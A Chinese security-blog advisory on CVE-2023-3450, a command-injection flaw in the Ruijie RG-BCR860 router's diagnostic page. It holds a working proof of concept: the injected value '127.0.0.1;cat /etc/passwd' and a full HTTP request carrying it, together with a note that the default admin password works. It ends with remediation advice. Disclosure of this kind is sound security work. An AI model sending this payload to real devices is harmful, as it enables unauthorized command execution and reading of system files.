探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-3450:Ruijie RG-BCR860 命令执行漏洞

漏洞简介

Ruijie Networks RG-BCR860是中国锐捷网络(Ruijie Networks)公司的一款商业云路由器。

Ruijie RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入

影响版本

Ruijie RG-BCR860 2.5.13 版本

漏洞利用

利用此漏洞需要高权限(默认密码admin登录)

127.0.0.1;cat /etc/passwd
GET /cgi-bin/luci/;stok=f039132f4ff3110277618cf485069fba/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0 HTTP/1.1
Host: 
Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Referer: 
Accept-Encoding: gzip, deflate
Cookie: sysauth=47a4d3e3eaaa553c8a275dd8ac2abe2f

CVE-2023-3450:Ruijie RG-BCR860 命令执行漏洞-威武网安

漏洞修复

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

该漏洞由于正常功能过滤不严格导致存在命令注入,并且需要高权限账号登录操作,建议修改登录密码为强口令,通过白名单控制访问原地址。

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-3450:Ruijie RG-BCR860 命令执行漏洞》
文章链接:https://www.wevul.com/1928.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册